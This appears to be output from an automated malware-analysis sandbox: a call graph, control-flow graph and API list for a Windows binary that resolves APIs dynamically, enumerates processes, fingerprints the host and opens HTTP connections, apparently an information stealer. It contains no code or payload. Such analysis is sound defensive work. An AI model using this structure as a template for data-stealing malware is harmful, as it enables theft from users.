80215 40425e 80214->80215 80216 4042dd wcslen wcslen wcslen wcslen 80215->80216 80217 40426d 7 API calls 80215->80217 80216->79720 80217->80215 80218->79801 80219->79822 80221 4116d4 80220->80221 80222 4116fa 80221->80222 80223 4116ea lstrcpyA 80221->80223 80222->79827 80223->80222 80225 411733 80224->80225 80226 411773 80225->80226 80227 411765 lstrcpyA 80225->80227 80226->79838 80227->80226 80229 404239 12 API calls 80228->80229 80230 40273b 80229->80230 80231 404239 12 API calls 80230->80231 80232 402754 80231->80232 80233 404239 12 API calls 80232->80233 80234 40276d 80233->80234 80235 404239 12 API calls 80234->80235 80236 402786 80235->80236 80237 404239 12 API calls 80236->80237 80238 40279f 80237->80238 80239 404239 12 API calls 80238->80239 80240 4027b8 80239->80240 80241 404239 12 API calls 80240->80241 80242 4027d1 80241->80242 80243 404239 12 API calls 80242->80243 80244 4027ea 80243->80244 80245 404239 12 API calls 80244->80245 80246 402803 80245->80246 80247 404239 12 API calls 80246->80247 80248 40281c 80247->80248 80249 404239 12 API calls 80248->80249 80250 402835 80249->80250 80251 404239 12 API calls 80250->80251 80252 40284e 80251->80252 80253 404239 12 API calls 80252->80253 80254 402867 80253->80254 80255 404239 12 API calls 80254->80255 80256 402880 80255->80256 80257 404239 12 API calls 80256->80257 80258 402899 80257->80258 80259 404239 12 API calls 80258->80259 80260 4028b2 80259->80260 80261 404239 12 API calls 80260->80261 80262 4028cb 80261->80262 80263 404239 12 API calls 80262->80263 80264 4028e4 80263->80264 80265 404239 12 API calls 80264->80265 80266 4028fd 80265->80266 80267 404239 12 API calls 80266->80267 80268 402916 80267->80268 80269 404239 12 API calls 80268->80269 80270 40292f 80269->80270 80271 404239 12 API calls 80270->80271 80272 402948 80271->80272 80273 404239 12 API calls 80272->80273 80274 402961 80273->80274 80275 404239 12 API calls 80274->80275 80276 40297a 80275->80276 80277 404239 12 API calls 80276->80277 
80278 402993 80277->80278 80279 404239 12 API calls 80278->80279 80280 4029ac 80279->80280 80281 404239 12 API calls 80280->80281 80282 4029c5 80281->80282 80283 404239 12 API calls 80282->80283 80284 4029de 80283->80284 80285 404239 12 API calls 80284->80285 80286 4029f7 80285->80286 80287 404239 12 API calls 80286->80287 80288 402a10 80287->80288 80289 404239 12 API calls 80288->80289 80290 402a29 80289->80290 80291 404239 12 API calls 80290->80291 80292 402a42 80291->80292 80293 404239 12 API calls 80292->80293 80294 402a5b 80293->80294 80295 404239 12 API calls 80294->80295 80296 402a74 80295->80296 80297 404239 12 API calls 80296->80297 80298 402a8d 80297->80298 80299 404239 12 API calls 80298->80299 80300 402aa6 80299->80300 80301 404239 12 API calls 80300->80301 80302 402abf 80301->80302 80303 404239 12 API calls 80302->80303 80304 402ad8 80303->80304 80305 404239 12 API calls 80304->80305 80306 402af1 80305->80306 80307 404239 12 API calls 80306->80307 80308 402b0a 80307->80308 80309 404239 12 API calls 80308->80309 80310 402b23 80309->80310 80311 404239 12 API calls 80310->80311 80312 402b3c 80311->80312 80313 404239 12 API calls 80312->80313 80314 402b55 80313->80314 80315 404239 12 API calls 80314->80315 80316 402b6e 80315->80316 80317 404239 12 API calls 80316->80317 80318 402b87 80317->80318 80319 404239 12 API calls 80318->80319 80320 402ba0 80319->80320 80321 404239 12 API calls 80320->80321 80322 402bb9 80321->80322 80323 404239 12 API calls 80322->80323 80324 402bd2 80323->80324 80325 404239 12 API calls 80324->80325 80326 402beb 80325->80326 80327 404239 12 API calls 80326->80327 80328 402c04 80327->80328 80329 404239 12 API calls 80328->80329 80330 402c1d 80329->80330 80331 404239 12 API calls 80330->80331 80332 402c36 80331->80332 80333 404239 12 API calls 80332->80333 80334 402c4f 80333->80334 80335 404239 12 API calls 80334->80335 80336 402c68 80335->80336 80337 404239 12 API calls 80336->80337 80338 402c81 80337->80338 80339 404239 12 API 
calls 80338->80339 80340 402c9a 80339->80340 80341 404239 12 API calls 80340->80341 80342 402cb3 80341->80342 80343 404239 12 API calls 80342->80343 80344 402ccc 80343->80344 80345 404239 12 API calls 80344->80345 80346 402ce5 80345->80346 80347 404239 12 API calls 80346->80347 80348 402cfe 80347->80348 80349 404239 12 API calls 80348->80349 80350 402d17 80349->80350 80351 404239 12 API calls 80350->80351 80352 402d30 80351->80352 80353 404239 12 API calls 80352->80353 80354 402d49 80353->80354 80355 404239 12 API calls 80354->80355 80356 402d62 80355->80356 80357 404239 12 API calls 80356->80357 80358 402d7b 80357->80358 80359 404239 12 API calls 80358->80359 80360 402d94 80359->80360 80361 404239 12 API calls 80360->80361 80362 402dad 80361->80362 80363 404239 12 API calls 80362->80363 80364 402dc6 80363->80364 80365 404239 12 API calls 80364->80365 80366 402ddf 80365->80366 80367 404239 12 API calls 80366->80367 80368 402df8 80367->80368 80369 404239 12 API calls 80368->80369 80370 402e11 80369->80370 80371 404239 12 API calls 80370->80371 80372 402e2a 80371->80372 80373 404239 12 API calls 80372->80373 80374 402e43 80373->80374 80375 404239 12 API calls 80374->80375 80376 402e5c 80375->80376 80377 404239 12 API calls 80376->80377 80378 402e75 80377->80378 80379 404239 12 API calls 80378->80379 80380 402e8e 80379->80380 80381 404239 12 API calls 80380->80381 80382 402ea7 80381->80382 80383 404239 12 API calls 80382->80383 80384 402ec0 80383->80384 80385 404239 12 API calls 80384->80385 80386 402ed9 80385->80386 80387 404239 12 API calls 80386->80387 80388 402ef2 80387->80388 80389 404239 12 API calls 80388->80389 80390 402f0b 80389->80390 80391 404239 12 API calls 80390->80391 80392 402f24 80391->80392 80393 404239 12 API calls 80392->80393 80394 402f3d 80393->80394 80395 404239 12 API calls 80394->80395 80396 402f56 80395->80396 80397 404239 12 API calls 80396->80397 80398 402f6f 80397->80398 80399 404239 12 API calls 80398->80399 80400 402f88 80399->80400 
80401 404239 12 API calls 80400->80401 80402 402fa1 80401->80402 80403 404239 12 API calls 80402->80403 80404 402fba 80403->80404 80405 404239 12 API calls 80404->80405 80406 402fd3 80405->80406 80407 404239 12 API calls 80406->80407 80408 402fec 80407->80408 80409 404239 12 API calls 80408->80409 80410 403005 80409->80410 80411 404239 12 API calls 80410->80411 80412 40301e 80411->80412 80413 404239 12 API calls 80412->80413 80414 403037 80413->80414 80415 404239 12 API calls 80414->80415 80416 403050 80415->80416 80417 404239 12 API calls 80416->80417 80418 403069 80417->80418 80419 404239 12 API calls 80418->80419 80420 403082 80419->80420 80421 404239 12 API calls 80420->80421 80422 40309b 80421->80422 80423 404239 12 API calls 80422->80423 80424 4030b4 80423->80424 80425 404239 12 API calls 80424->80425 80426 4030cd 80425->80426 80427 404239 12 API calls 80426->80427 80428 4030e6 80427->80428 80429 404239 12 API calls 80428->80429 80430 4030ff 80429->80430 80431 404239 12 API calls 80430->80431 80432 403118 80431->80432 80433 404239 12 API calls 80432->80433 80434 403131 80433->80434 80435 404239 12 API calls 80434->80435 80436 40314a 80435->80436 80437 404239 12 API calls 80436->80437 80438 403163 80437->80438 80439 404239 12 API calls 80438->80439 80440 40317c 80439->80440 80441 404239 12 API calls 80440->80441 80442 403195 80441->80442 80443 404239 12 API calls 80442->80443 80444 4031ae 80443->80444 80445 404239 12 API calls 80444->80445 80446 4031c7 80445->80446 80447 404239 12 API calls 80446->80447 80448 4031e0 80447->80448 80449 404239 12 API calls 80448->80449 80450 4031f9 80449->80450 80451 404239 12 API calls 80450->80451 80452 403212 80451->80452 80453 404239 12 API calls 80452->80453 80454 40322b 80453->80454 80455 404239 12 API calls 80454->80455 80456 403244 80455->80456 80457 404239 12 API calls 80456->80457 80458 40325d 80457->80458 80459 404239 12 API calls 80458->80459 80460 403276 80459->80460 80461 404239 12 API calls 80460->80461 80462 
40328f 80461->80462 80463 404239 12 API calls 80462->80463 80464 4032a8 80463->80464 80465 404239 12 API calls 80464->80465 80466 4032c1 80465->80466 80467 404239 12 API calls 80466->80467 80468 4032da 80467->80468 80469 404239 12 API calls 80468->80469 80470 4032f3 80469->80470 80471 404239 12 API calls 80470->80471 80472 40330c 80471->80472 80473 404239 12 API calls 80472->80473 80474 403325 80473->80474 80475 404239 12 API calls 80474->80475 80476 40333e 80475->80476 80477 404239 12 API calls 80476->80477 80478 403357 80477->80478 80479 404239 12 API calls 80478->80479 80480 403370 80479->80480 80481 404239 12 API calls 80480->80481 80482 403389 80481->80482 80483 404239 12 API calls 80482->80483 80484 4033a2 80483->80484 80485 404239 12 API calls 80484->80485 80486 4033bb 80485->80486 80487 404239 12 API calls 80486->80487 80488 4033d4 80487->80488 80489 404239 12 API calls 80488->80489 80490 4033ed 80489->80490 80491 404239 12 API calls 80490->80491 80492 403406 80491->80492 80493 404239 12 API calls 80492->80493 80494 40341f 80493->80494 80495 404239 12 API calls 80494->80495 80496 403438 80495->80496 80497 404239 12 API calls 80496->80497 80498 403451 80497->80498 80499 404239 12 API calls 80498->80499 80500 40346a 80499->80500 80501 404239 12 API calls 80500->80501 80502 403483 80501->80502 80503 404239 12 API calls 80502->80503 80504 40349c 80503->80504 80505 404239 12 API calls 80504->80505 80506 4034b5 80505->80506 80507 404239 12 API calls 80506->80507 80508 4034ce 80507->80508 80509 404239 12 API calls 80508->80509 80510 4034e7 80509->80510 80511 404239 12 API calls 80510->80511 80512 403500 80511->80512 80513 404239 12 API calls 80512->80513 80514 403519 80513->80514 80515 404239 12 API calls 80514->80515 80516 403532 80515->80516 80517 404239 12 API calls 80516->80517 80518 40354b 80517->80518 80519 404239 12 API calls 80518->80519 80520 403564 80519->80520 80521 404239 12 API calls 80520->80521 80522 40357d 80521->80522 80523 404239 12 API calls 
80522->80523 80524 403596 80523->80524 80525 404239 12 API calls 80524->80525 80526 4035af 80525->80526 80527 404239 12 API calls 80526->80527 80528 4035c8 80527->80528 80529 404239 12 API calls 80528->80529 80530 4035e1 80529->80530 80531 404239 12 API calls 80530->80531 80532 4035fa 80531->80532 80533 404239 12 API calls 80532->80533 80534 403613 80533->80534 80535 404239 12 API calls 80534->80535 80536 40362c 80535->80536 80537 404239 12 API calls 80536->80537 80538 403645 80537->80538 80539 404239 12 API calls 80538->80539 80540 40365e 80539->80540 80541 404239 12 API calls 80540->80541 80542 403677 80541->80542 80543 404239 12 API calls 80542->80543 80544 403690 80543->80544 80545 404239 12 API calls 80544->80545 80546 4036a9 80545->80546 80547 404239 12 API calls 80546->80547 80548 4036c2 80547->80548 80549 404239 12 API calls 80548->80549 80550 4036db 80549->80550 80551 404239 12 API calls 80550->80551 80552 4036f4 80551->80552 80553 404239 12 API calls 80552->80553 80554 40370d 80553->80554 80555 404239 12 API calls 80554->80555 80556 403726 80555->80556 80557 404239 12 API calls 80556->80557 80558 40373f 80557->80558 80559 404239 12 API calls 80558->80559 80560 403758 80559->80560 80561 404239 12 API calls 80560->80561 80562 403771 80561->80562 80563 404239 12 API calls 80562->80563 80564 40378a 80563->80564 80565 404239 12 API calls 80564->80565 80566 4037a3 80565->80566 80567 404239 12 API calls 80566->80567 80568 4037bc 80567->80568 80569 404239 12 API calls 80568->80569 80570 4037d5 80569->80570 80571 404239 12 API calls 80570->80571 80572 4037ee 80571->80572 80573 404239 12 API calls 80572->80573 80574 403807 80573->80574 80575 404239 12 API calls 80574->80575 80576 403820 80575->80576 80577 404239 12 API calls 80576->80577 80578 403839 80577->80578 80579 404239 12 API calls 80578->80579 80580 403852 80579->80580 80581 404239 12 API calls 80580->80581 80582 40386b 80581->80582 80583 404239 12 API calls 80582->80583 80584 403884 80583->80584 80585 
404239 12 API calls 80584->80585 80586 40389d 80585->80586 80587 404239 12 API calls 80586->80587 80588 4038b6 80587->80588 80589 404239 12 API calls 80588->80589 80590 4038cf 80589->80590 80591 404239 12 API calls 80590->80591 80592 4038e8 80591->80592 80593 404239 12 API calls 80592->80593 80594 403901 80593->80594 80595 404239 12 API calls 80594->80595 80596 40391a 80595->80596 80597 404239 12 API calls 80596->80597 80598 403933 80597->80598 80599 404239 12 API calls 80598->80599 80600 40394c 80599->80600 80601 404239 12 API calls 80600->80601 80602 403965 80601->80602 80603 404239 12 API calls 80602->80603 80604 40397e 80603->80604 80605 404239 12 API calls 80604->80605 80606 403997 80605->80606 80607 404239 12 API calls 80606->80607 80608 4039b0 80607->80608 80609 404239 12 API calls 80608->80609 80610 4039c9 80609->80610 80611 404239 12 API calls 80610->80611 80612 4039e2 80611->80612 80613 404239 12 API calls 80612->80613 80614 4039fb 80613->80614 80615 404239 12 API calls 80614->80615 80616 403a14 80615->80616 80617 404239 12 API calls 80616->80617 80618 403a2d 80617->80618 80619 404239 12 API calls 80618->80619 80620 403a46 80619->80620 80621 404239 12 API calls 80620->80621 80622 403a5f 80621->80622 80623 404239 12 API calls 80622->80623 80624 403a78 80623->80624 80625 404239 12 API calls 80624->80625 80626 403a91 80625->80626 80627 404239 12 API calls 80626->80627 80628 403aaa 80627->80628 80629 404239 12 API calls 80628->80629 80630 403ac3 80629->80630 80631 404239 12 API calls 80630->80631 80632 403adc 80631->80632 80633 404239 12 API calls 80632->80633 80634 403af5 80633->80634 80635 404239 12 API calls 80634->80635 80636 403b0e 80635->80636 80637 404239 12 API calls 80636->80637 80638 403b27 80637->80638 80639 404239 12 API calls 80638->80639 80640 403b40 80639->80640 80641 404239 12 API calls 80640->80641 80642 403b59 80641->80642 80643 404239 12 API calls 80642->80643 80644 403b72 80643->80644 80645 404239 12 API calls 80644->80645 80646 403b8b 
80645->80646 80647 404239 12 API calls 80646->80647 80648 403ba4 80647->80648 80649 404239 12 API calls 80648->80649 80650 403bbd 80649->80650 80651 404239 12 API calls 80650->80651 80652 403bd6 80651->80652 80653 404239 12 API calls 80652->80653 80654 403bef 80653->80654 80655 404239 12 API calls 80654->80655 80656 403c08 80655->80656 80657 404239 12 API calls 80656->80657 80658 403c21 80657->80658 80659 404239 12 API calls 80658->80659 80660 403c3a 80659->80660 80661 404239 12 API calls 80660->80661 80662 403c53 80661->80662 80663 404239 12 API calls 80662->80663 80664 403c6c 80663->80664 80665 404239 12 API calls 80664->80665 80666 403c85 80665->80666 80667 404239 12 API calls 80666->80667 80668 403c9e 80667->80668 80669 404239 12 API calls 80668->80669 80670 403cb7 80669->80670 80671 404239 12 API calls 80670->80671 80672 403cd0 80671->80672 80673 404239 12 API calls 80672->80673 80674 403ce9 80673->80674 80675 404239 12 API calls 80674->80675 80676 403d02 80675->80676 80677 404239 12 API calls 80676->80677 80678 403d1b 80677->80678 80679 404239 12 API calls 80678->80679 80680 403d34 80679->80680 80681 404239 12 API calls 80680->80681 80682 403d4d 80681->80682 80683 404239 12 API calls 80682->80683 80684 403d66 80683->80684 80685 404239 12 API calls 80684->80685 80686 403d7f 80685->80686 80687 404239 12 API calls 80686->80687 80688 403d98 80687->80688 80689 404239 12 API calls 80688->80689 80690 403db1 80689->80690 80691 404239 12 API calls 80690->80691 80692 403dca 80691->80692 80693 404239 12 API calls 80692->80693 80694 403de3 80693->80694 80695 404239 12 API calls 80694->80695 80696 403dfc 80695->80696 80697 404239 12 API calls 80696->80697 80698 403e15 80697->80698 80699 404239 12 API calls 80698->80699 80700 403e2e 80699->80700 80701 404239 12 API calls 80700->80701 80702 403e47 80701->80702 80703 404239 12 API calls 80702->80703 80704 403e60 80703->80704 80705 404239 12 API calls 80704->80705 80706 403e79 80705->80706 80707 404239 12 API calls 
80706->80707 80708 403e92 80707->80708 80709 404239 12 API calls 80708->80709 80710 403eab 80709->80710 80711 404239 12 API calls 80710->80711 80712 403ec4 80711->80712 80713 404239 12 API calls 80712->80713 80714 403edd 80713->80714 80715 404239 12 API calls 80714->80715 80716 403ef6 80715->80716 80717 404239 12 API calls 80716->80717 80718 403f0f 80717->80718 80719 404239 12 API calls 80718->80719 80720 403f28 80719->80720 80721 404239 12 API calls 80720->80721 80722 403f41 80721->80722 80723 404239 12 API calls 80722->80723 80724 403f5a 80723->80724 80725 404239 12 API calls 80724->80725 80726 403f73 80725->80726 80727 404239 12 API calls 80726->80727 80728 403f8c 80727->80728 80729 404239 12 API calls 80728->80729 80730 403fa5 80729->80730 80731 404239 12 API calls 80730->80731 80732 403fbe 80731->80732 80733 404239 12 API calls 80732->80733 80734 403fd7 80733->80734 80735 404239 12 API calls 80734->80735 80736 403ff0 80735->80736 80737 404239 12 API calls 80736->80737 80738 404009 80737->80738 80739 404239 12 API calls 80738->80739 80740 404022 80739->80740 80741 404239 12 API calls 80740->80741 80742 40403b 80741->80742 80743 404239 12 API calls 80742->80743 80744 404054 80743->80744 80745 404239 12 API calls 80744->80745 80746 40406d 80745->80746 80747 404239 12 API calls 80746->80747 80748 404086 80747->80748 80749 404239 12 API calls 80748->80749 80750 40409f 80749->80750 80751 404239 12 API calls 80750->80751 80752 4040b8 80751->80752 80753 404239 12 API calls 80752->80753 80754 4040d1 80753->80754 80755 404239 12 API calls 80754->80755 80756 4040ea 80755->80756 80757 404239 12 API calls 80756->80757 80758 404103 80757->80758 80759 404239 12 API calls 80758->80759 80760 40411c 80759->80760 80761 404239 12 API calls 80760->80761 80762 404135 80761->80762 80763 404239 12 API calls 80762->80763 80764 40414e 80763->80764 80765 404239 12 API calls 80764->80765 80766 404167 80765->80766 80767 404239 12 API calls 80766->80767 80768 404180 80767->80768 80769 
404239 12 API calls 80768->80769 80770 404199 80769->80770 80771 404239 12 API calls 80770->80771 80772 4041b2 80771->80772 80773 404239 12 API calls 80772->80773 80774 4041cb 80773->80774 80775 404239 12 API calls 80774->80775 80776 4041e4 80775->80776 80777 404239 12 API calls 80776->80777 80778 4041fd 80777->80778 80779 404239 12 API calls 80778->80779 80780 404216 80779->80780 80781 404239 12 API calls 80780->80781 80782 40422f 80781->80782 80783 41b050 80782->80783 80784 41b060 50 API calls 80783->80784 80785 41b4d7 9 API calls 80783->80785 80784->80785 80786 41b578 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80785->80786 80787 41b5eb 80785->80787 80786->80787 80788 41b6b0 80787->80788 80789 41b5f8 8 API calls 80787->80789 80790 41b6b9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80788->80790 80791 41b72c 80788->80791 80789->80788 80790->80791 80792 41b7c3 80791->80792 80793 41b739 6 API calls 80791->80793 80794 41b7d0 9 API calls 80792->80794 80795 41b89f 80792->80795 80793->80792 80794->80795 80796 41b8a8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80795->80796 80797 41b91b 80795->80797 80796->80797 80798 41b952 80797->80798 80799 41b924 GetProcAddress GetProcAddress 80797->80799 80800 41b989 80798->80800 80801 41b95b GetProcAddress GetProcAddress 80798->80801 80799->80798 80802 41b996 10 API calls 80800->80802 80803 41ba7a 80800->80803 80801->80800 80802->80803 80804 41ba83 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80803->80804 80805 41badf 80803->80805 80804->80805 80806 41bae8 GetProcAddress 80805->80806 80807 41baff 80805->80807 80806->80807 80808 41bb64 80807->80808 80809 41bb08 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80807->80809 80810 41bb83 80808->80810 80811 41bb6d GetProcAddress 80808->80811 80809->80808 80810->79843 80811->80810 80813 413940 FindCloseChangeNotification 80812->80813 80814 413912 Process32Next 
80812->80814 80816 41395c 80813->80816 80814->80813 80815 413926 StrCmpCA 80814->80815 80817 41393a 80815->80817 80816->80040 80818 4216c8 80816->80818 80817->80814 82023 4214fa 80818->82023 80820 4216db 80820->80040 80822 411668 lstrcpyA 80821->80822 80823 412d78 80822->80823 80824 411668 lstrcpyA 80823->80824 80825 412d86 GetSystemTime 80824->80825 80826 412d9d 80825->80826 80827 4116b4 lstrcpyA 80826->80827 80828 412df5 80827->80828 80828->79846 80830 4117f1 80829->80830 80831 411840 80830->80831 80833 411824 lstrcpyA lstrcatA 80830->80833 80832 4116b4 lstrcpyA 80831->80832 80834 41184c 80832->80834 80833->80831 80834->79863 80836 4116b4 lstrcpyA 80835->80836 80837 40135e 80836->80837 80838 4116b4 lstrcpyA 80837->80838 80839 401370 80838->80839 80840 4116b4 lstrcpyA 80839->80840 80841 401382 80840->80841 80842 4116b4 lstrcpyA 80841->80842 80843 4013ac 80842->80843 80844 418167 80843->80844 80845 418178 80844->80845 80846 411715 2 API calls 80845->80846 80847 418185 80846->80847 80848 411715 2 API calls 80847->80848 80849 418192 80848->80849 80850 411715 2 API calls 80849->80850 80851 41819f 80850->80851 80852 411668 lstrcpyA 80851->80852 80853 4181ac 80852->80853 80854 411668 lstrcpyA 80853->80854 80855 4181b9 80854->80855 80856 411668 lstrcpyA 80855->80856 80857 4181c6 80856->80857 80858 411668 lstrcpyA 80857->80858 80859 4181d3 80858->80859 80860 411668 lstrcpyA 80859->80860 80861 4181e0 80860->80861 80862 411668 lstrcpyA 80861->80862 80930 4181ed 80862->80930 80863 402282 lstrcpyA 80863->80930 80864 4022c1 lstrcpyA 80864->80930 80865 417f35 28 API calls 80865->80930 80866 4182bc StrCmpCA 80866->80930 80867 418320 StrCmpCA 80868 418469 80867->80868 80867->80930 80869 41177a lstrcpyA 80868->80869 80870 418475 80869->80870 82046 4022c1 80870->82046 80873 41177a lstrcpyA 80875 41848b 80873->80875 80874 418518 StrCmpCA 80877 418661 80874->80877 80874->80930 82049 40230f lstrcpyA 80875->82049 80876 402297 lstrcpyA 80876->80930 80878 41177a lstrcpyA 80877->80878 
80879 41866d 80878->80879 80882 4022c1 lstrcpyA 80879->80882 80880 4022ac lstrcpyA 80880->80930 80885 418679 80882->80885 80883 4184a2 80884 41177a lstrcpyA 80883->80884 80886 4184ac 80884->80886 80887 41177a lstrcpyA 80885->80887 82050 418c28 lstrcpyA 80886->82050 80889 418683 80887->80889 80888 418710 StrCmpCA 80890 418859 80888->80890 80888->80930 82051 40230f lstrcpyA 80889->82051 80892 41177a lstrcpyA 80890->80892 80896 418865 80892->80896 80893 41177a lstrcpyA 80893->80930 80894 4022eb lstrcpyA 80894->80930 82053 4022d6 lstrcpyA 80896->82053 80897 41869a 80899 41177a lstrcpyA 80897->80899 80901 4186a4 80899->80901 80900 418871 80902 41177a lstrcpyA 80900->80902 82052 418c28 lstrcpyA 80901->82052 80905 41887b 80902->80905 80903 41840d StrCmpCA 80903->80930 80904 418908 StrCmpCA 80906 418a51 80904->80906 80904->80930 82054 402324 lstrcpyA 80905->82054 80907 41177a lstrcpyA 80906->80907 80910 418a5d 80907->80910 82056 4022d6 lstrcpyA 80910->82056 80911 418892 80914 41177a lstrcpyA 80911->80914 80913 4116b4 lstrcpyA 80913->80930 80916 41889c 80914->80916 80915 418a69 80917 41177a lstrcpyA 80915->80917 82055 418c28 lstrcpyA 80916->82055 80920 418a73 80917->80920 80918 418605 StrCmpCA 80918->80930 80919 418b00 StrCmpCA 80921 418b20 80919->80921 80922 418b0b Sleep 80919->80922 82057 402324 lstrcpyA 80920->82057 80925 41177a lstrcpyA 80921->80925 80922->80930 80924 4184c3 80924->79878 80926 418b2c 80925->80926 82059 4022d6 lstrcpyA 80926->82059 80929 418a8a 80932 41177a lstrcpyA 80929->80932 80930->80863 80930->80864 80930->80865 80930->80866 80930->80867 80930->80874 80930->80876 80930->80880 80930->80888 80930->80893 80930->80894 80930->80903 80930->80904 80930->80913 80930->80918 80930->80919 80935 4022d6 lstrcpyA 80930->80935 80936 4187fd StrCmpCA 80930->80936 80943 4189f5 StrCmpCA 80930->80943 80944 417e48 23 API calls 80930->80944 80946 40134c lstrcpyA 80930->80946 80931 418b38 80933 41177a lstrcpyA 80931->80933 80934 418a94 80932->80934 80937 418b42 
80933->80937 82058 418c28 lstrcpyA 80934->82058 80935->80930 80936->80930 82060 4022d6 lstrcpyA 80937->82060 80940 418b59 80941 41177a lstrcpyA 80940->80941 80942 418b63 80941->80942 82061 418c28 lstrcpyA 80942->82061 80943->80930 80944->80930 80946->80930 80948 41177a lstrcpyA 80947->80948 80949 41a4dd 80948->80949 80950 41177a lstrcpyA 80949->80950 80951 41a4ef 80950->80951 80952 41177a lstrcpyA 80951->80952 80953 41a501 80952->80953 80953->79880 80954->79913 80956 411975 GetVolumeInformationA 80955->80956 80957 41196e 80955->80957 80958 4119b3 80956->80958 80957->80956 80959 411a11 GetProcessHeap HeapAlloc 80958->80959 80960 411a40 wsprintfA lstrcatA 80959->80960 80961 411a2e 80959->80961 82062 412667 GetCurrentHwProfileA 80960->82062 80963 411668 lstrcpyA 80961->80963 80965 411a38 80963->80965 80964 411a74 80966 411a7d lstrlenA 80964->80966 80965->79927 80967 411a91 80966->80967 82068 4136ce lstrcpyA malloc strncpy 80967->82068 80969 411a9e 80970 411aa8 lstrcatA 80969->80970 80971 411abd 80970->80971 80972 411668 lstrcpyA 80971->80972 80973 411ad0 80972->80973 80973->80965 80975 4116b4 lstrcpyA 80974->80975 80976 404413 80975->80976 82069 40430f 80976->82069 80978 40441f 80979 411668 lstrcpyA 80978->80979 80980 40444d 80979->80980 80981 411668 lstrcpyA 80980->80981 80982 40445a 80981->80982 80983 411668 lstrcpyA 80982->80983 80984 404467 80983->80984 80985 411668 lstrcpyA 80984->80985 80986 404474 80985->80986 80987 411668 lstrcpyA 80986->80987 80988 404481 80987->80988 80989 404491 InternetOpenA StrCmpCA 80988->80989 80990 4044bc 80989->80990 80991 404a55 InternetCloseHandle 80990->80991 80992 412d64 3 API calls 80990->80992 80996 404a69 ctype 80991->80996 80993 4044db 80992->80993 80994 4117e0 3 API calls 80993->80994 80995 4044ed 80994->80995 80997 41177a lstrcpyA 80995->80997 80998 4116b4 lstrcpyA 80996->80998 80999 4044f6 80997->80999 81010 404a83 80998->81010 81000 41185b 4 API calls 80999->81000 81001 404520 81000->81001 81002 41177a lstrcpyA 
81001->81002 81003 404529 81002->81003 81004 41185b 4 API calls 81003->81004 81005 404548 81004->81005 81006 41177a lstrcpyA 81005->81006 81007 404551 81006->81007 81008 4117e0 3 API calls 81007->81008 81009 40456f 81008->81009 81011 41177a lstrcpyA 81009->81011 81010->79931 81012 404578 81011->81012 81013 41185b 4 API calls 81012->81013 81014 404597 81013->81014 81015 41177a lstrcpyA 81014->81015 81016 4045a0 81015->81016 81017 41185b 4 API calls 81016->81017 81018 4045bf 81017->81018 81019 41177a lstrcpyA 81018->81019 81020 4045c8 81019->81020 81021 41185b 4 API calls 81020->81021 81022 4045f3 81021->81022 81023 4117e0 3 API calls 81022->81023 81024 4045fa 81023->81024 81025 41177a lstrcpyA 81024->81025 81026 404603 81025->81026 81027 404619 InternetConnectA 81026->81027 81027->80991 81028 404645 HttpOpenRequestA 81027->81028 81030 404695 81028->81030 81031 404a49 InternetCloseHandle 81028->81031 81032 4046c0 81030->81032 81033 40469b InternetSetOptionA 81030->81033 81031->80991 81034 41185b 4 API calls 81032->81034 81033->81032 81035 4046d4 81034->81035 81036 41177a lstrcpyA 81035->81036 81037 4046dd 81036->81037 81038 4117e0 3 API calls 81037->81038 81039 4046fb 81038->81039 81040 41177a lstrcpyA 81039->81040 81041 404704 81040->81041 81042 41185b 4 API calls 81041->81042 81043 404723 81042->81043 81044 41177a lstrcpyA 81043->81044 81045 40472c 81044->81045 81046 41185b 4 API calls 81045->81046 81047 40474c 81046->81047 81048 41177a lstrcpyA 81047->81048 81049 404755 81048->81049 81050 41185b 4 API calls 81049->81050 81051 404774 81050->81051 81052 41177a lstrcpyA 81051->81052 81053 40477d 81052->81053 81054 41185b 4 API calls 81053->81054 81055 40479c 81054->81055 81056 41177a lstrcpyA 81055->81056 81057 4047a5 81056->81057 81058 4117e0 3 API calls 81057->81058 81059 4047c3 81058->81059 81060 41177a lstrcpyA 81059->81060 81061 4047cc 81060->81061 81062 41185b 4 API calls 81061->81062 81063 4047eb 81062->81063 81064 41177a lstrcpyA 81063->81064 81065 4047f4 

                                                    Control-flow Graph

                                                    control_flow_graph 592 41b050-41b05a 593 41b060-41b4d2 GetProcAddress * 50 592->593 594 41b4d7-41b576 LoadLibraryA * 9 592->594 593->594 595 41b578-41b5e6 GetProcAddress * 5 594->595 596 41b5eb-41b5f2 594->596 595->596 597 41b6b0-41b6b7 596->597 598 41b5f8-41b6ab GetProcAddress * 8 596->598 599 41b6b9-41b727 GetProcAddress * 5 597->599 600 41b72c-41b733 597->600 598->597 599->600 601 41b7c3-41b7ca 600->601 602 41b739-41b7be GetProcAddress * 6 600->602 603 41b7d0-41b89a GetProcAddress * 9 601->603 604 41b89f-41b8a6 601->604 602->601 603->604 605 41b8a8-41b916 GetProcAddress * 5 604->605 606 41b91b-41b922 604->606 605->606 607 41b952-41b959 606->607 608 41b924-41b94d GetProcAddress * 2 606->608 609 41b989-41b990 607->609 610 41b95b-41b984 GetProcAddress * 2 607->610 608->607 611 41b996-41ba75 GetProcAddress * 10 609->611 612 41ba7a-41ba81 609->612 610->609 611->612 613 41ba83-41bada GetProcAddress * 4 612->613 614 41badf-41bae6 612->614 613->614 615 41bae8-41bafa GetProcAddress 614->615 616 41baff-41bb06 614->616 615->616 617 41bb64-41bb6b 616->617 618 41bb08-41bb5f GetProcAddress * 4 616->618 619 41bb83-41bb84 617->619 620 41bb6d-41bb7e GetProcAddress 617->620 618->617 620->619
                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B06C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B083
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B09A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0B1
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0C8
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0DF
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0F6
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B10D
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B124
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B13B
